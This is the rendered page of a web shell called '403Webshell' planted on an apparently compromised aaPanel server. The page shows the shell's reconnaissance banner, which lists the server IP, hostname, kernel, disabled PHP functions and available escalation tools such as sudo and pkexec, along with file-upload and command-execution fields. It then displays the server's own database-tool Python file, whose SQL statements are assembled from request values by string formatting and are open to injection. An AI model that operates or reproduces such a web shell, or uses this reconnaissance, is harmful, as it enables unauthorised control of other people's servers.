403Webshell
Server IP : 172.67.216.182  /  Your IP : 172.70.147.45
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/datatool_v2.py
# coding: utf-8
# -------------------------------------------------------------------
# aaPanel
# -------------------------------------------------------------------
# Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved.
# -------------------------------------------------------------------
# Author: [email protected]
# -------------------------------------------------------------------

# ------------------------------
# 数据库工具类
# ------------------------------
import sys, os
os.chdir("/www/server/panel")
if not 'class/' in sys.path:
    sys.path.insert(0,'class/')
import panelMysql
import re,json,public

class datatools:
    DB_MySQL = None
    # 字节单位转换
    def ToSize(self, size):
        ds = ['b', 'KB', 'MB', 'GB', 'TB']
        for d in ds:
            if size < 1024: return ('%.2f' % size) + d
            size = size / 1024
        return '0b'

    # 获取当前数据库信息
    def GetdataInfo(self,get):
        '''
        传递一个数据库名称即可 get.databases
        '''

        db_name=get.db_name
        if not db_name:return False
        if not self.DB_MySQL:self.DB_MySQL = public.get_mysql_obj(db_name)
        if not self.DB_MySQL: return self.DB_MySQL
        ret = {}
        tables = self.map_to_list(self.DB_MySQL.query('show tables from `%s`' % db_name))
        if type(tables) == list:
            try:
                data = self.map_to_list(self.DB_MySQL.query("select sum(DATA_LENGTH)+sum(INDEX_LENGTH) from information_schema.tables  where table_schema='%s'" % db_name))[0][0]
            except:
                data=0

            if not data: data = 0
            ret['data_size'] = self.ToSize(data)
            ret['database'] = db_name

            ret3 = []
            for i in tables:
                if i == 1049: return public.return_msg_gettext(False, public.lang("Database does NOT exist!"))
                if type(i) == int: continue
                table = self.map_to_list(self.DB_MySQL.query("show table status from `%s` where name = '%s'" % (db_name, i[0])))
                if not table: continue
                try:
                    ret2 = {}
                    ret2['type']=table[0][1]
                    data_size = table[0][6]
                    ret2['rows_count'] = self.DB_MySQL.query("select count(*) from `{}`.`{}`".format(db_name,i[0]))[0][0] #table[0][4]  实时获取行数 @authow hwliang<2021-08-05> 修改
                    ret2['collation'] = table[0][14]
                    ret2['data_size'] = self.ToSize(int(data_size))
                    ret2['table_name'] = i[0]
                    ret3.append(ret2)
                except: continue
            ret['tables'] = (ret3)
        return ret



    #修复表信息
    def RepairTable(self,get):
        
        '''
        POST:
        db_name=web
        tables=['web1','web2']
        '''
        db_name = get.db_name
        tables = json.loads(get.tables)
        if not db_name or not tables: return False
        if not self.DB_MySQL:self.DB_MySQL = public.get_mysql_obj(db_name)
        m_version = self.DB_MySQL.query('select version();')[0][0]
        if m_version.find('5.1.')!=-1:return public.return_msg_gettext(False, public.lang("Nonsupport mysql5.1!"))
        mysql_table = self.map_to_list(self.DB_MySQL.query('show tables from `%s`' % db_name))
        ret=[]
        if type(mysql_table)==list:
            if len(mysql_table)>0:
                for i in mysql_table:
                    for i2 in tables:
                        if i2==i[0]:
                            ret.append(i2)
                if len(ret)>0:
                    for i in ret:
                        self.DB_MySQL.execute('REPAIR TABLE `%s`.`%s`'%(db_name,i))
                    return True 
        return False



    #map to list
    def map_to_list(self,map_obj):
        try:
            if type(map_obj) != list and type(map_obj) != str: map_obj = list(map_obj)
            return map_obj
        except: return []


    # 优化表
    def OptimizeTable(self,get):
        '''
        POST:
        db_name=web
        tables=['web1','web2']
        '''

        db_name = get.db_name
        tables = json.loads(get.tables)
        if not db_name or not tables: return False
        if not self.DB_MySQL:self.DB_MySQL = public.get_mysql_obj(db_name)
        mysql_table = self.map_to_list(self.DB_MySQL.query('show tables from `%s`' % db_name))
        ret=[]
        if type(mysql_table) == list:
            if len(mysql_table) > 0:
                for i in mysql_table:
                    for i2 in tables:
                        if i2 == i[0]:
                            ret.append(i2)
                if len(ret)>0:
                    for i in ret:
                        self.DB_MySQL.execute('OPTIMIZE table `%s`.`%s` ENGINE=MyISAM' % (db_name,i))
                    return True 
        return False

    # 更改表引擎
    def AlterTable(self,get):
        '''
        POST:
        db_name=web
        table_type=innodb
        tables=['web1','web2']
        '''
        db_name = get.db_name
        table_type = get.table_type
        tables = json.loads(get.tables)

        if not db_name or not tables: return False
        if not self.DB_MySQL:self.DB_MySQL = public.get_mysql_obj(db_name)
        mysql_table = self.map_to_list(self.DB_MySQL.query('show tables from `%s`' % db_name))
        ret=[]
        if type(mysql_table)==list:
            if len(mysql_table)>0:
                for i in mysql_table:
                    for i2 in tables:
                        if i2==i[0]:
                            ret.append(i2)
                if len(ret)>0:
                    for i in ret:
                        self.DB_MySQL.execute('alter table `%s`.`%s` ENGINE=`%s`' % (db_name,i,table_type))
                    return True
        return False


    #检查表
    def CheckTable(self,database,tables,*args,**kwargs):
        pass

Youez - 2016 - github.com/yon3zu
LinuXploit